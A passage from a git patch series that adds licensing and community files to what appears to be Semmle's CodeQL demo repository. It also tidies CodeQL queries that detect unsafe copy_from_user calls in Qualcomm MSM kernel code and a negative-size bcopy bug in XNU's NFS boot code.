developed in steps, starting with `01_paths_to_icmp_error.ql`. From 548dd6053897f5641bac0f5e588af7bb9e889b27 Mon Sep 17 00:00:00 2001 From: Kevin Backhouse Date: Wed, 6 Feb 2019 15:00:33 +0000 Subject: [PATCH 03/36] Make LICENSE, COPYRIGHT, CONTRIBUTING.md, and CODE_OF_CONDUCT.md consistent with other Semmle repositories. --- CODE_OF_CONDUCT.md | 39 ++++++++++ CONTRIBUTING.md | 46 ++++++++++++ COPYRIGHT | 13 ++++ LICENSE | 176 +++++++++++++++++++++++++++++++++++++++++++++ LICENSE.md | 13 ---- NOTICE.md | 2 - 6 files changed, 274 insertions(+), 15 deletions(-) create mode 100644 CODE_OF_CONDUCT.md create mode 100644 CONTRIBUTING.md create mode 100644 COPYRIGHT create mode 100644 LICENSE delete mode 100644 LICENSE.md delete mode 100644 NOTICE.md diff --git a/CODE_OF_CONDUCT.md b/CODE_OF_CONDUCT.md new file mode 100644 index 0000000..ed69d4a --- /dev/null +++ b/CODE_OF_CONDUCT.md @@ -0,0 +1,39 @@ +# Code of Conduct + +This code of conduct outlines expectations for participation in the Semmle open source community, including any open source repositories on GitHub.com, as well as steps for reporting unacceptable behavior. We are committed to providing a welcoming and inspiring community for all. + +People violating this code of conduct may be banned from the community. + +Our community strives to: +* Be friendly and patient: Remember you might not be communicating in someone else’s primary spoken or programming language, and others may not have your level of understanding. +* Be welcoming: Our community welcomes and supports people of all backgrounds and identities. This includes, but is not limited to members of any race, ethnicity, culture, national origin, color, immigration status, social and economic class, educational level, sex, sexual orientation, gender identity and expression, age, size, family status, political belief, religion, and mental and physical ability. +* Be respectful: We are a world-wide community of professionals, and we conduct ourselves professionally. Disagreement is no excuse for poor behavior and poor manners. Disrespectful and unacceptable behavior includes, but is not limited to: + * Violent threats or language. + * Discriminatory or derogatory jokes and language. + * Posting sexually explicit or violent material. + * Posting, or threatening to post, people’s personally identifying information (“doxing”). + * Insults, especially those using discriminatory terms or slurs. + * Behavior that could be perceived as sexual attention. +* Advocating for or encouraging any of the above behaviors. +* Understand disagreements: Disagreements, both social and technical, are useful learning opportunities. Seek to understand others’ viewpoints and resolve differences constructively. + +This code is not exhaustive or complete. It serves to capture our common understanding of a productive, collaborative environment. We expect the code to be followed in spirit as much as in the letter. + +# Scope + +This code of conduct applies to all repositories and communities for Semmle open source projects, regardless of whether or not the repository explicitly calls out its use of this code. The code also applies in public spaces when an individual is representing the Semmle open source community. Examples include using an official project email address, posting via an official social media account, or acting as an appointed representative at an online or offline event. + + +# Reporting Code of Conduct Issues +We encourage members of the community to resolve issues on their own whenever possible. This builds a broader and deeper understanding and ultimately a healthier interaction. In the event that an issue cannot be resolved locally, please feel free to report your concerns by contacting code-of-conduct@semmle.com. +In your report please include: +* Your contact information. +* Names (real, usernames or pseudonyms) of any individuals involved. If there are additional witnesses, please include them as well. +* Your account of what occurred, and if you believe the incident is ongoing. If there is a publicly available record (e.g. a mailing list archive or a public chat log), please include a link or attachment. +* Any additional information that may be helpful. + +All reports will be reviewed by a multi-person team and will result in a response that is deemed necessary and appropriate to the circumstances. Where additional perspectives are needed, the team may seek insight from others with relevant expertise or experience. The confidentiality of the person reporting the incident will be kept at all times. Involved parties are never part of the review team. + +Anyone asked to stop unacceptable behavior is expected to comply immediately. If an individual engages in unacceptable behavior, the review team may take any action they deem appropriate, including a permanent ban from the community. + +*This text is licensed under the [CC-BY-4.0](https://creativecommons.org/licenses/by/4.0/) license. It is based on a template established by the [TODO Group](http://todogroup.org/) and variants thereof used by numerous other large communities (e.g., [Microsoft](https://microsoft.github.io/codeofconduct/), [Facebook](https://code.fb.com/codeofconduct/), [Yahoo](https://yahoo.github.io/codeofconduct), [Twitter](https://github.com/twitter/code-of-conduct), [GitHub](https://blog.github.com/2015-07-20-adopting-the-open-code-of-conduct/)) and the Scope section from the [Contributor Covenant version 1.4](http://contributor-covenant.org/version/1/4/).* diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md new file mode 100644 index 0000000..7e7620e --- /dev/null +++ b/CONTRIBUTING.md @@ -0,0 +1,46 @@ +# Contributing to Semmle open-source projects + +We welcome contributions to our project. If you have an idea or a bugfix then please go ahead an open a Pull Request! + +Before we accept your pull request, we will require that you have agreed to our Contributor License Agreement. This is not something that you need to do before you submit your pull request, but until you've done so, we will be unable to accept your contribution. + +## Using your personal data + +If you contribute to this project, we will record your name and email +address (as provided by you with your contributions) as part of the code +repositories, which might be made public. We might also use this information +to contact you in relation to your contributions, as well as in the +normal course of software development. We also store records of your +CLA agreements. Under GDPR legislation, we do this +on the basis of our legitimate interest in creating the QL product. + +Please do get in touch (privacy@semmle.com) if you have any questions about +this or our data protection policies. + +## Contributor License Agreement + +This Contributor License Agreement (“Agreement”) is entered into between Semmle Limited (“Semmle,” “we” or “us” etc.), and You (as defined and further identified below). + +Accordingly, You hereby agree to the following terms for Your present and future Contributions submitted to Semmle: + +1. **Definitions**. + + * "You" (or "Your") shall mean the Contribution copyright owner (whether an individual or organization) or legal entity authorized by the copyright owner that is making this Agreement with Semmle. For legal entities, the entity making a Contribution and all other entities that control, are controlled by, or are under common control with that entity are considered to be a single Contributor. For the purposes of this definition, "control" means (i) the power, direct or indirect, to cause the direction or management of such entity, whether by contract or otherwise, or (ii) ownership of fifty percent (50%) or more of the outstanding shares, or (iii) beneficial ownership of such entity. + + * "Contribution(s)" shall mean the code, documentation or other original works of authorship, including any modifications or additions to an existing work, submitted by You to Semmle for inclusion in, or documentation of, any of the products or projects owned or managed by Semmle (the "Work(s)"). For the purposes of this definition, "submitted" means any form of electronic, verbal, or written communication sent to Semmle or its representatives, including but not limited to communication on electronic mailing lists, source code control systems, and issue tracking systems that are managed by, or on behalf of, Semmle for the purpose of discussing and/or improving the Work, but excluding communication that is conspicuously marked or otherwise designated in writing by You as "Not a Contribution." + +2. **Grant of Copyright License**. You hereby grant to Semmle and to recipients of software distributed by Semmle a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable copyright license to reproduce, prepare derivative works of, publicly display, publicly perform, sublicense, and distribute Your Contributions and such derivative works. + +3. **Grant of Patent License**. You hereby grant to Semmle and to recipients of software distributed by Semmle a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable (except as stated in this section) patent license to make, have made, use, offer to sell, sell, import, and otherwise transfer the Work, where such license applies only to those patent claims licensable by You that are necessarily infringed by Your Contribution(s) alone or by combination of Your Contribution(s) with the Work to which such Contribution(s) was submitted. If any entity institutes patent litigation against You or any other entity (including a cross-claim or counterclaim in a lawsuit) alleging that Your Contribution, or the Work to which You have contributed, constitutes direct or contributory patent infringement, then any patent licenses granted to that entity under this Agreement for that Contribution or Work shall terminate as of the date such litigation is filed. + +4. **Ownership**. Except as set out above, You keep all right, title, and interest in Your Contribution. The rights that You grant to us under this Agreement are effective on the date You first submitted a Contribution to us, even if Your submission took place before the date You entered this Agreement. + +5. **Representations**. You represent and warrant that: (i) the Contributions are an original work and that You can legally grant the rights set out in this Agreement; (ii) the Contributions and Semmle’s exercise of any license rights granted hereunder, does not and will not, infringe the rights of any third party; (iii) You are not aware of any pending or threatened claims, suits, actions, or charges pertaining to the Contributions, including without limitation any claims or allegations that any or all of the Contributions infringes, violates, or misappropriate the intellectual property rights of any third party (You further agree that You will notify Semmle immediately if You become aware of any such actual or potential claims, suits, actions, allegations or charges). + +6. **Employer**. If Your employer(s) has rights to intellectual property that You create that includes Your Contributions, You represent and warrant that Your employer has waived such rights for Your Contributions to Semmle, or that You have received permission to make Contributions on behalf of that employer and that You are authorized to execute this Agreement on behalf of Your employer. + +7. **Inclusion of Code**. We determine the code that is in our Works. You understand that the decision to include the Contribution in any project or source repository is entirely that of Semmle, and this agreement does not guarantee that the Contributions will be included in any product. + +8. **Disclaimer**. You are not expected to provide support for Your Contributions, except to the extent You desire to provide support. You may provide support for free, for a fee, or not at all. Except as set forth herein, and unless required by applicable law or agreed to in writing, You provide Your Contributions on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND. + +9. **General**. The failure of either party to enforce its rights under this Agreement for any period shall not be construed as a waiver of such rights. No changes or modifications or waivers to this Agreement will be effective unless in writing and signed by both parties. In the event that any provision of this Agreement shall be determined to be illegal or unenforceable, that provision will be limited or eliminated to the minimum extent necessary so that this Agreement shall otherwise remain in full force and effect and enforceable. This Agreement shall be governed by and construed in accordance with the laws of the State of California in the United States without regard to the conflicts of laws provisions thereof. In any action or proceeding to enforce rights under this Agreement, the prevailing party will be entitled to recover costs and attorneys’ fees. diff --git a/COPYRIGHT b/COPYRIGHT new file mode 100644 index 0000000..65d947f --- /dev/null +++ b/COPYRIGHT @@ -0,0 +1,13 @@ +Copyright (c) Semmle Inc and other contributors. All rights reserved. + +Licensed under the Apache License, Version 2.0 (the "License"); you may not use +this file except in compliance with the License. You may obtain a copy of the +License at http://www.apache.org/licenses/LICENSE-2.0 + +THIS CODE IS PROVIDED ON AN *AS IS* BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +KIND, EITHER EXPRESS OR IMPLIED, INCLUDING WITHOUT LIMITATION ANY IMPLIED +WARRANTIES OR CONDITIONS OF TITLE, FITNESS FOR A PARTICULAR PURPOSE, +MERCHANTABLITY OR NON-INFRINGEMENT. + +See the Apache Version 2.0 License for specific language governing permissions +and limitations under the License. diff --git a/LICENSE b/LICENSE new file mode 100644 index 0000000..d9a10c0 --- /dev/null +++ b/LICENSE @@ -0,0 +1,176 @@ + Apache License + Version 2.0, January 2004 + http://www.apache.org/licenses/ + + TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION + + 1. Definitions. + + "License" shall mean the terms and conditions for use, reproduction, + and distribution as defined by Sections 1 through 9 of this document. + + "Licensor" shall mean the copyright owner or entity authorized by + the copyright owner that is granting the License. + + "Legal Entity" shall mean the union of the acting entity and all + other entities that control, are controlled by, or are under common + control with that entity. For the purposes of this definition, + "control" means (i) the power, direct or indirect, to cause the + direction or management of such entity, whether by contract or + otherwise, or (ii) ownership of fifty percent (50%) or more of the + outstanding shares, or (iii) beneficial ownership of such entity. + + "You" (or "Your") shall mean an individual or Legal Entity + exercising permissions granted by this License. + + "Source" form shall mean the preferred form for making modifications, + including but not limited to software source code, documentation + source, and configuration files. + + "Object" form shall mean any form resulting from mechanical + transformation or translation of a Source form, including but + not limited to compiled object code, generated documentation, + and conversions to other media types. + + "Work" shall mean the work of authorship, whether in Source or + Object form, made available under the License, as indicated by a + copyright notice that is included in or attached to the work + (an example is provided in the Appendix below). + + "Derivative Works" shall mean any work, whether in Source or Object + form, that is based on (or derived from) the Work and for which the + editorial revisions, annotations, elaborations, or other modifications + represent, as a whole, an original work of authorship. For the purposes + of this License, Derivative Works shall not include works that remain + separable from, or merely link (or bind by name) to the interfaces of, + the Work and Derivative Works thereof. + + "Contribution" shall mean any work of authorship, including + the original version of the Work and any modifications or additions + to that Work or Derivative Works thereof, that is intentionally + submitted to Licensor for inclusion in the Work by the copyright owner + or by an individual or Legal Entity authorized to submit on behalf of + the copyright owner. For the purposes of this definition, "submitted" + means any form of electronic, verbal, or written communication sent + to the Licensor or its representatives, including but not limited to + communication on electronic mailing lists, source code control systems, + and issue tracking systems that are managed by, or on behalf of, the + Licensor for the purpose of discussing and improving the Work, but + excluding communication that is conspicuously marked or otherwise + designated in writing by the copyright owner as "Not a Contribution." + + "Contributor" shall mean Licensor and any individual or Legal Entity + on behalf of whom a Contribution has been received by Licensor and + subsequently incorporated within the Work. + + 2. Grant of Copyright License. Subject to the terms and conditions of + this License, each Contributor hereby grants to You a perpetual, + worldwide, non-exclusive, no-charge, royalty-free, irrevocable + copyright license to reproduce, prepare Derivative Works of, + publicly display, publicly perform, sublicense, and distribute the + Work and such Derivative Works in Source or Object form. + + 3. Grant of Patent License. Subject to the terms and conditions of + this License, each Contributor hereby grants to You a perpetual, + worldwide, non-exclusive, no-charge, royalty-free, irrevocable + (except as stated in this section) patent license to make, have made, + use, offer to sell, sell, import, and otherwise transfer the Work, + where such license applies only to those patent claims licensable + by such Contributor that are necessarily infringed by their + Contribution(s) alone or by combination of their Contribution(s) + with the Work to which such Contribution(s) was submitted. If You + institute patent litigation against any entity (including a + cross-claim or counterclaim in a lawsuit) alleging that the Work + or a Contribution incorporated within the Work constitutes direct + or contributory patent infringement, then any patent licenses + granted to You under this License for that Work shall terminate + as of the date such litigation is filed. + + 4. Redistribution. You may reproduce and distribute copies of the + Work or Derivative Works thereof in any medium, with or without + modifications, and in Source or Object form, provided that You + meet the following conditions: + + (a) You must give any other recipients of the Work or + Derivative Works a copy of this License; and + + (b) You must cause any modified files to carry prominent notices + stating that You changed the files; and + + (c) You must retain, in the Source form of any Derivative Works + that You distribute, all copyright, patent, trademark, and + attribution notices from the Source form of the Work, + excluding those notices that do not pertain to any part of + the Derivative Works; and + + (d) If the Work includes a "NOTICE" text file as part of its + distribution, then any Derivative Works that You distribute must + include a readable copy of the attribution notices contained + within such NOTICE file, excluding those notices that do not + pertain to any part of the Derivative Works, in at least one + of the following places: within a NOTICE text file distributed + as part of the Derivative Works; within the Source form or + documentation, if provided along with the Derivative Works; or, + within a display generated by the Derivative Works, if and + wherever such third-party notices normally appear. The contents + of the NOTICE file are for informational purposes only and + do not modify the License. You may add Your own attribution + notices within Derivative Works that You distribute, alongside + or as an addendum to the NOTICE text from the Work, provided + that such additional attribution notices cannot be construed + as modifying the License. + + You may add Your own copyright statement to Your modifications and + may provide additional or different license terms and conditions + for use, reproduction, or distribution of Your modifications, or + for any such Derivative Works as a whole, provided Your use, + reproduction, and distribution of the Work otherwise complies with + the conditions stated in this License. + + 5. Submission of Contributions. Unless You explicitly state otherwise, + any Contribution intentionally submitted for inclusion in the Work + by You to the Licensor shall be under the terms and conditions of + this License, without any additional terms or conditions. + Notwithstanding the above, nothing herein shall supersede or modify + the terms of any separate license agreement you may have executed + with Licensor regarding such Contributions. + + 6. Trademarks. This License does not grant permission to use the trade + names, trademarks, service marks, or product names of the Licensor, + except as required for reasonable and customary use in describing the + origin of the Work and reproducing the content of the NOTICE file. + + 7. Disclaimer of Warranty. Unless required by applicable law or + agreed to in writing, Licensor provides the Work (and each + Contributor provides its Contributions) on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or + implied, including, without limitation, any warranties or conditions + of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A + PARTICULAR PURPOSE. You are solely responsible for determining the + appropriateness of using or redistributing the Work and assume any + risks associated with Your exercise of permissions under this License. + + 8. Limitation of Liability. In no event and under no legal theory, + whether in tort (including negligence), contract, or otherwise, + unless required by applicable law (such as deliberate and grossly + negligent acts) or agreed to in writing, shall any Contributor be + liable to You for damages, including any direct, indirect, special, + incidental, or consequential damages of any character arising as a + result of this License or out of the use or inability to use the + Work (including but not limited to damages for loss of goodwill, + work stoppage, computer failure or malfunction, or any and all + other commercial damages or losses), even if such Contributor + has been advised of the possibility of such damages. + + 9. Accepting Warranty or Additional Liability. While redistributing + the Work or Derivative Works thereof, You may choose to offer, + and charge a fee for, acceptance of support, warranty, indemnity, + or other liability obligations and/or rights consistent with this + License. However, in accepting such obligations, You may act only + on Your own behalf and on Your sole responsibility, not on behalf + of any other Contributor, and only if You agree to indemnify, + defend, and hold each Contributor harmless for any liability + incurred by, or claims asserted against, such Contributor by reason + of your accepting any such warranty or additional liability. + + END OF TERMS AND CONDITIONS diff --git a/LICENSE.md b/LICENSE.md deleted file mode 100644 index db8fd5c..0000000 --- a/LICENSE.md +++ /dev/null @@ -1,13 +0,0 @@ -Copyright 2019 Semmle Ltd. - -Licensed under the Apache License, Version 2.0 (the "License"); -you may not use this file except in compliance with the License. -You may obtain a copy of the License at - - http://www.apache.org/licenses/LICENSE-2.0 - -Unless required by applicable law or agreed to in writing, software -distributed under the License is distributed on an "AS IS" BASIS, -WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -See the License for the specific language governing permissions and -limitations under the License. diff --git a/NOTICE.md b/NOTICE.md deleted file mode 100644 index cab83e0..0000000 --- a/NOTICE.md +++ /dev/null @@ -1,2 +0,0 @@ -## Semmle Demos -Copyright 2019 Semmle Ltd. From b433ee26669e66b0b862ff05b2b0c100b1a602d3 Mon Sep 17 00:00:00 2001 From: Jonas Jensen Date: Tue, 26 Feb 2019 11:26:31 +0100 Subject: [PATCH 04/36] MSM: remove unnecessary imports --- .../cpp/Qualcomm-MSM-copy_from_user/00_copy_from_user.ql | 1 - ql_demos/cpp/Qualcomm-MSM-copy_from_user/04_safe_malloc.ql | 5 ++--- .../05_filter_with_upperbound_and_safe_malloc.ql | 5 ++--- .../Qualcomm-MSM-copy_from_user/06_stackaddress_dataflow.ql | 4 +--- 4 files changed, 5 insertions(+), 10 deletions(-) diff --git a/ql_demos/cpp/Qualcomm-MSM-copy_from_user/00_copy_from_user.ql b/ql_demos/cpp/Qualcomm-MSM-copy_from_user/00_copy_from_user.ql index a586401..52d7f7c 100644 --- a/ql_demos/cpp/Qualcomm-MSM-copy_from_user/00_copy_from_user.ql +++ b/ql_demos/cpp/Qualcomm-MSM-copy_from_user/00_copy_from_user.ql @@ -5,7 +5,6 @@ */ import cpp -import semmle.code.cpp.rangeanalysis.SimpleRangeAnalysis // This first query is essentially equivalent to `grep -r copy_from_user`. // It has almost 1300 results. diff --git a/ql_demos/cpp/Qualcomm-MSM-copy_from_user/04_safe_malloc.ql b/ql_demos/cpp/Qualcomm-MSM-copy_from_user/04_safe_malloc.ql index e023bf2..c7099ae 100644 --- a/ql_demos/cpp/Qualcomm-MSM-copy_from_user/04_safe_malloc.ql +++ b/ql_demos/cpp/Qualcomm-MSM-copy_from_user/04_safe_malloc.ql @@ -7,8 +7,7 @@ import cpp import semmle.code.cpp.valuenumbering.GlobalValueNumbering -import semmle.code.cpp.dataflow.TaintTracking -import DataFlow +import semmle.code.cpp.dataflow.DataFlow // Let's see if we can detect this pattern: // @@ -26,7 +25,7 @@ predicate safe_malloc(FunctionCall allocCall, FunctionCall copy_from_user) { copy_from_user.getTarget().getName() = "copy_from_user" and source.asExpr() = allocCall and sink.asExpr() = copy_from_user.getArgument(0) and - localFlow(source, sink) and + DataFlow::localFlow(source, sink) and globalValueNumber(allocCall.getArgument(0)) = globalValueNumber(copy_from_user.getArgument(2))) } diff --git a/ql_demos/cpp/Qualcomm-MSM-copy_from_user/05_filter_with_upperbound_and_safe_malloc.ql b/ql_demos/cpp/Qualcomm-MSM-copy_from_user/05_filter_with_upperbound_and_safe_malloc.ql index bafb293..9cb8a8e 100644 --- a/ql_demos/cpp/Qualcomm-MSM-copy_from_user/05_filter_with_upperbound_and_safe_malloc.ql +++ b/ql_demos/cpp/Qualcomm-MSM-copy_from_user/05_filter_with_upperbound_and_safe_malloc.ql @@ -10,8 +10,7 @@ import cpp import semmle.code.cpp.rangeanalysis.SimpleRangeAnalysis import semmle.code.cpp.valuenumbering.GlobalValueNumbering -import semmle.code.cpp.dataflow.TaintTracking -import DataFlow +import semmle.code.cpp.dataflow.DataFlow // We wrote this predicate in the previous query. predicate safe_malloc(FunctionCall allocCall, FunctionCall copy_from_user) { @@ -20,7 +19,7 @@ predicate safe_malloc(FunctionCall allocCall, FunctionCall copy_from_user) { copy_from_user.getTarget().getName() = "copy_from_user" and source.asExpr() = allocCall and sink.asExpr() = copy_from_user.getArgument(0) and - localFlow(source, sink) and + DataFlow::localFlow(source, sink) and globalValueNumber(allocCall.getArgument(0)) = globalValueNumber(copy_from_user.getArgument(2))) } diff --git a/ql_demos/cpp/Qualcomm-MSM-copy_from_user/06_stackaddress_dataflow.ql b/ql_demos/cpp/Qualcomm-MSM-copy_from_user/06_stackaddress_dataflow.ql index b6b45f1..635fc01 100644 --- a/ql_demos/cpp/Qualcomm-MSM-copy_from_user/06_stackaddress_dataflow.ql +++ b/ql_demos/cpp/Qualcomm-MSM-copy_from_user/06_stackaddress_dataflow.ql @@ -10,9 +10,7 @@ import cpp import semmle.code.cpp.rangeanalysis.SimpleRangeAnalysis -import semmle.code.cpp.valuenumbering.GlobalValueNumbering -import semmle.code.cpp.dataflow.TaintTracking -import DataFlow +import semmle.code.cpp.dataflow.DataFlow import DataFlow::PathGraph class Config extends DataFlow::Configuration { From 65e471f225fd7ac8ac065a8cbe3d6cddf211209a Mon Sep 17 00:00:00 2001 From: Jonas Jensen Date: Tue, 26 Feb 2019 12:53:49 +0100 Subject: [PATCH 05/36] XNU NFS: Use TaintTracking library This library wasn't available on LGTM when the query was written, but it's there now. --- .../BCopyNegativeSize.ql | 12 ++++-------- 1 file changed, 4 insertions(+), 8 deletions(-) diff --git a/ql_demos/cpp/XNU_NFS_Boot_CVE-2018-4136_CVE-2018-4160/BCopyNegativeSize.ql b/ql_demos/cpp/XNU_NFS_Boot_CVE-2018-4136_CVE-2018-4160/BCopyNegativeSize.ql index 0cb626f..33b814f 100644 --- a/ql_demos/cpp/XNU_NFS_Boot_CVE-2018-4136_CVE-2018-4160/BCopyNegativeSize.ql +++ b/ql_demos/cpp/XNU_NFS_Boot_CVE-2018-4136_CVE-2018-4160/BCopyNegativeSize.ql @@ -8,11 +8,11 @@ */ import cpp -import semmle.code.cpp.dataflow.DataFlow +import semmle.code.cpp.dataflow.TaintTracking import semmle.code.cpp.rangeanalysis.SimpleRangeAnalysis import DataFlow::PathGraph -class MyCfg extends DataFlow::Configuration { +class MyCfg extends TaintTracking::Configuration { MyCfg() { this = "MyCfg" } @@ -27,12 +27,8 @@ class MyCfg extends DataFlow::Configuration { override predicate isSource(DataFlow::Node source) { source.asExpr().(FunctionCall).getTarget().getName() = "mbuf_data" } - - override predicate isAdditionalFlowStep(DataFlow::Node node1, DataFlow::Node node2) { - node2.asExpr() = node1.asExpr().getParent() - } } -from DataFlow::PathNode sink, DataFlow::PathNode source, MyCfg dataFlow -where dataFlow.hasFlowPath(source, sink) +from DataFlow::PathNode sink, DataFlow::PathNode source, MyCfg cfg +where cfg.hasFlowPath(source, sink) select sink, source, sink, "The size argument of bcopy might be negative." From 868da83065b0fd8afe56bb87389b7abd492b8395 Mon Sep 17 00:00:00 2001 From: Jonas Jensen Date: Thu, 28 Feb 2019 11:23:03 +0100 Subject: [PATCH 06/36] NFS: order source before sink --- .../BCopyNegativeSize.ql | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/ql_demos/cpp/XNU_NFS_Boot_CVE-2018-4136_CVE-2018-4160/BCopyNegativeSize.ql b/ql_demos/cpp/XNU_NFS_Boot_CVE-2018-4136_CVE-2018-4160/BCopyNegativeSize.ql index 33b814f..94ae60f 100644 --- a/ql_demos/cpp/XNU_NFS_Boot_CVE-2018-4136_CVE-2018-4160/BCopyNegativeSize.ql +++ b/ql_demos/cpp/XNU_NFS_Boot_CVE-2018-4136_CVE-2018-4160/BCopyNegativeSize.ql @@ -17,16 +17,16 @@ class MyCfg extends TaintTracking::Configuration { this = "MyCfg" } + override predicate isSource(DataFlow::Node source) { + source.asExpr().(FunctionCall).getTarget().getName() = "mbuf_data" + } + override predicate isSink(DataFlow::Node sink) { exists (FunctionCall call | sink.asExpr() = call.getArgument(2) and call.getTarget().getName() = "__builtin___memmove_chk" and lowerBound(sink.asExpr()) < 0) } - - override predicate isSource(DataFlow::Node source) { - source.asExpr().(FunctionCall).getTarget().getName() = "mbuf_data" - } } from DataFlow::PathNode sink, DataFlow::PathNode source, MyCfg cfg From 37ae4f356f08787691872d39a0721ba4b15181ec Mon Sep 17 00:00:00 2001 From: Jonas Jensen Date: Thu, 28 Feb 2019 11:23:14 +0100 Subject: [PATCH 07/36] MSM: Update and reformat @descriptions --- .../Qualcomm-MSM-copy_from_user/00_copy_from_user.ql | 2 +- .../01_copy_from_user_annotated.ql | 12 +++++------- .../02_filter_with_upperbound.ql | 7 +++---- .../03_filter_with_upperbound.ql | 9 ++++----- .../Qualcomm-MSM-copy_from_user/04_safe_malloc.ql | 6 +++--- .../05_filter_with_upperbound_and_safe_malloc.ql | 11 ++++++----- .../06_stackaddress_dataflow.ql | 9 ++++----- 7 files changed, 26 insertions(+), 30 deletions(-) diff --git a/ql_demos/cpp/Qualcomm-MSM-copy_from_user/00_copy_from_user.ql b/ql_demos/cpp/Qualcomm-MSM-copy_from_user/00_copy_from_user.ql index 52d7f7c..616560f 100644 --- a/ql_demos/cpp/Qualcomm-MSM-copy_from_user/00_copy_from_user.ql +++ b/ql_demos/cpp/Qualcomm-MSM-copy_from_user/00_copy_from_user.ql @@ -1,6 +1,6 @@ /** * @name Calls to copy_from_user - * @description Find all calls to copy from user. + * @description Find all calls to copy_from_user. * @problem.severity warning */ diff --git a/ql_demos/cpp/Qualcomm-MSM-copy_from_user/01_copy_from_user_annotated.ql b/ql_demos/cpp/Qualcomm-MSM-copy_from_user/01_copy_from_user_annotated.ql index cb40164..f309fef 100644 --- a/ql_demos/cpp/Qualcomm-MSM-copy_from_user/01_copy_from_user_annotated.ql +++ b/ql_demos/cpp/Qualcomm-MSM-copy_from_user/01_copy_from_user_annotated.ql @@ -1,9 +1,7 @@ /** - * @name Filter with upper bound - * @description This query excludes results that are - * safe because the upper bound of the size argument - * is less than or equal to the size of the destination - * buffer. + * @name Annotate with types and bounds + * @description Find all calls to copy_from_user and annotates them with their + * type and inferred size bounds. * @problem.severity warning */ @@ -21,8 +19,8 @@ import semmle.code.cpp.rangeanalysis.SimpleRangeAnalysis // size argument of copy_from_user. These calls are safe. from FunctionCall call, Expr destArg, Expr sizeArg where call.getTarget().getName() = "copy_from_user" -and destArg = call.getArgument(0) -and sizeArg = call.getArgument(2) + and destArg = call.getArgument(0) + and sizeArg = call.getArgument(2) select call, destArg.getType(), diff --git a/ql_demos/cpp/Qualcomm-MSM-copy_from_user/02_filter_with_upperbound.ql b/ql_demos/cpp/Qualcomm-MSM-copy_from_user/02_filter_with_upperbound.ql index 5c35aa3..ee1e6ea 100644 --- a/ql_demos/cpp/Qualcomm-MSM-copy_from_user/02_filter_with_upperbound.ql +++ b/ql_demos/cpp/Qualcomm-MSM-copy_from_user/02_filter_with_upperbound.ql @@ -1,9 +1,8 @@ /** * @name Filter with upper bound - * @description This query excludes results that are - * safe because the upper bound of the size argument - * is less than or equal to the size of the destination - * buffer. + * @description This query excludes results that are safe because the upper + * bound of the size argument is less than or equal to the size of + * the destination variable. * @problem.severity warning */ diff --git a/ql_demos/cpp/Qualcomm-MSM-copy_from_user/03_filter_with_upperbound.ql b/ql_demos/cpp/Qualcomm-MSM-copy_from_user/03_filter_with_upperbound.ql index 2380693..302d025 100644 --- a/ql_demos/cpp/Qualcomm-MSM-copy_from_user/03_filter_with_upperbound.ql +++ b/ql_demos/cpp/Qualcomm-MSM-copy_from_user/03_filter_with_upperbound.ql @@ -1,9 +1,8 @@ /** - * @name Filter with upper bound - * @description This query excludes results that are - * safe because the upper bound of the size argument - * is less than or equal to the size of the destination - * buffer. + * @name Filter with upper bound, also for arrays + * @description This query excludes results that are safe because the upper + * bound of the size argument is less than or equal to the size of + * the destination variable or array. * @problem.severity warning */ diff --git a/ql_demos/cpp/Qualcomm-MSM-copy_from_user/04_safe_malloc.ql b/ql_demos/cpp/Qualcomm-MSM-copy_from_user/04_safe_malloc.ql index c7099ae..2e5da27 100644 --- a/ql_demos/cpp/Qualcomm-MSM-copy_from_user/04_safe_malloc.ql +++ b/ql_demos/cpp/Qualcomm-MSM-copy_from_user/04_safe_malloc.ql @@ -1,7 +1,7 @@ /** - * @name SafeMalloc - * @description If the copy_from_user is preceded by a kzalloc of - * the correct size, then it is safe. + * @name kzalloc only + * @description If the copy_from_user is preceded by a kzalloc of the correct + * size, then it is safe. To demonstrate, find only those results. * @problem.severity warning */ diff --git a/ql_demos/cpp/Qualcomm-MSM-copy_from_user/05_filter_with_upperbound_and_safe_malloc.ql b/ql_demos/cpp/Qualcomm-MSM-copy_from_user/05_filter_with_upperbound_and_safe_malloc.ql index 9cb8a8e..df5271d 100644 --- a/ql_demos/cpp/Qualcomm-MSM-copy_from_user/05_filter_with_upperbound_and_safe_malloc.ql +++ b/ql_demos/cpp/Qualcomm-MSM-copy_from_user/05_filter_with_upperbound_and_safe_malloc.ql @@ -1,9 +1,10 @@ /** - * @name Filter with upper bound - * @description This query excludes results that are - * safe because the upper bound of the size argument - * is less than or equal to the size of the destination - * buffer. + * @name Filter with upper bound and kzalloc + * @description This query excludes results that are safe because the upper + * bound of the size argument is less than or equal to the size of + * the destination variable or array. It also excludes results + * that are safe because the right amount of memory was allocated + * with kzalloc. * @problem.severity warning */ diff --git a/ql_demos/cpp/Qualcomm-MSM-copy_from_user/06_stackaddress_dataflow.ql b/ql_demos/cpp/Qualcomm-MSM-copy_from_user/06_stackaddress_dataflow.ql index 635fc01..891e387 100644 --- a/ql_demos/cpp/Qualcomm-MSM-copy_from_user/06_stackaddress_dataflow.ql +++ b/ql_demos/cpp/Qualcomm-MSM-copy_from_user/06_stackaddress_dataflow.ql @@ -1,11 +1,10 @@ /** - * @name Stack address dataflow - * @description This query excludes results that are - * safe because the upper bound of the size argument - * is less than or equal to the size of the destination - * buffer. + * @name Data flow from stack variable address + * @description This restricts results to those that are most likely to be + * dangerous: copying directly into a stack variable. * @kind path-problem * @problem.severity warning + * @id demo/msm/06-stackaddress-dataflow */ import cpp From f86ab8d400889783b1b1f73d2b273af355e4d6bb Mon Sep 17 00:00:00 2001 From: Jonas Jensen Date: Thu, 28 Feb 2019 11:24:35 +0100 Subject: [PATCH 08/36] MSM: autoformat all queries --- .../01_copy_from_user_annotated.ql | 13 ++++----- .../02_filter_with_upperbound.ql | 15 +++++------ .../03_filter_with_upperbound.ql | 17 +++++------- .../04_safe_malloc.ql | 8 +++--- 